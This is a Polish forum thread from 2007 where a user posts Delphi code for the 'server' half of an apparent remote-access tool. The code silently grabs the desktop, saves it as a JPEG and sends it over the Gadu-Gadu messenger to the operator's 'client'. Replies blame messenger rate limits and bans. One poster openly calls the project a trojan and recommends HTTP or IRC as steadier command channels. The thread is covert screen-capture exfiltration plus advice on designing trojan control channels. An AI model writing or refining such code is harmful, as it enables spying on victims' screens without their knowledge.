GGLite

Ripp

Użytkownik
Dołączył
Październik 16, 2007
Posty
106
Witam.
Mam maly problem z przesylka screenow w gglite. Screen owszem dochodzi do klienta, drugi tez, ale jak proboje trzeci to w ogole nie daje rady. Po tym zadna wiadomosc nie dochodzi do klienta z serwera w przeciagu 30-40minut(moze troche krocej)

Kod:

Server:

Kod:
 Can := TCanvas.Create;

   Can.Handle := GetWindowDC(GetDesktopWindow);

   B := TBitmap.Create;

   B.Width := Screen.Width;

   B.Height := Screen.Height;

   B.Canvas.CopyRect(Rect(0, 0, Screen.Width, Screen.Height), Can, Rect(0, 0, Screen.Width, Screen.Height));

       JPG := TJPEGImage.Create;

     JPG.Assign(B);

     JPG.CompressionQuality:=20; 

     JPG.DIBNeeded;

     JPG.Compress;

     JPG.SaveToFile('C:WINDOWSscreen.jpg');

      Can.Free;

   B.Free;

   JPG.Free;

     sleep(1000);

      ImageFile:=TFileStream.Create('C:WINDOWSscreen.jpg', fmOpenReadWrite);

gg.GGSendImage(true,000000, 'screen.jpg', $FF00FF00, ImageFile);

gg.GGSendImage(false,000000, 'screen.jpg', $FF00FF00, ImageFile);

  ImageFile.Free;

  DeleteFile('C:WINDOWSscreen.jpg');

Klient:

Kod:
procedure TForm1.GGRecvImage(Sender: TObject; ImageSize, ImageCRC32,

  ImageFrom: Integer; ImageBody: TMemoryStream);

begin

beep;

 ImageBody.SaveToFile('D:screen.jpg');

image1.Picture.LoadFromFile('D:screen.jpg');

Form4.Image1.Picture:=form1.image1.picture;



end;

Jakies poprawki? Screen wazy nie wiecej niz 100kb (40-60kb)
 

Dark Smark

Były Moderator
Dołączył
Kwiecień 29, 2006
Posty
1953
Jest to spowodowane limitem wysyłania wiadomości na określony czas. Możesz napisać do obsługi gadu-gadu to Ci odpiszą że to jest chwilowe zablokowanie numeru (ban) i może być spowodowane: "bla bla bla". Pamiętam że w jednym punkcie było właśnie wyróżnione że może się tak zdarzyć przy częstym/lub szybkim wysyłaniu plików graficznych. Kod jest w porządku raczej.

@Do niższej wypowiedzi:
Wysyłałem ze swojego numeru gadu często obrazki. Nagle nic nie dochodziło do osób i do mnie ale byłem dostępny. Zalogowałem się na inny numer działało, z mojego nie ale byłem zalogowany. Wysłałem wiadomość do obsługi i napisali że "albo korzystam z innego komunikatora niż gadu-gadu, albo wiadomości graficzne często wysyłane".
 

Ripp

Użytkownik
Dołączył
Październik 16, 2007
Posty
106
Dziekuje za odpowiedz
smile.gif

Ale wydaje mi sie, ze gdyby byl to ban, to serwer w ogole nie moglby sie zalogowac na gg. Jak sie myle, to prosze o poprawienie
<


[ Dodano: 17-12-2007, 20:03 ]
Przepraszam, ze odswieze temat, ale zaczelo mnie nurtowac inne pytanie zwiazane z tym.
Wiec jak tak jest, to czemu w np Wspomagaczu screena moge przesylac co kilka sekund? (np 10s) i jakos nr gg banu nie dostaje ;/
 

Kornik52

Były Moderator
Dołączył
Sierpień 12, 2004
Posty
848
Originally posted by Ripp
[ Dodano: 17-12-2007, 20:03 ]
Przepraszam, ze odswieze temat, ale zaczelo mnie nurtowac inne pytanie zwiazane z tym.
Wiec jak tak jest, to czemu w np Wspomagaczu screena moge przesylac co kilka sekund? (np 10s) i jakos nr gg banu nie dostaje ;/
Tam jest wysyłane to przez FTP, Mail etc..
<
 

/carnage

Użytkownik
Dołączył
Lipiec 2, 2007
Posty
35
Jak Kornik52 napisał wyżej, wspomagacz wysyłając pliki graficzne wogóle nie korzysta z protokołu gg tylko ma dodatkowe oddzielnie napisane funkce które są odpowiedzialne za wysyłanie pliku na ftp.
 
3

31337

Gość
Tak to wlasnie jest, trojan ma dzialac na stabilnym, jasnym, i prostym protokole!
A nie na gg, ktore rozne numery robi (cenzura i ban sa tego idealnym przykladem).
Dlaczego nie zrobicie tego przez http, w prawdzie klient musial by co sekunde wysylac geta, ale bylo by duzo mniej bledow, i nieskonczona liczba serwerow z 1 execa. Juz pomijam irc, niewiedziec czemu pod niego sie nic nie pisze.
Ludzie, czy prosciej wam jest implementowac protokol gg, niz irc? eee...
 
Do góry Bottom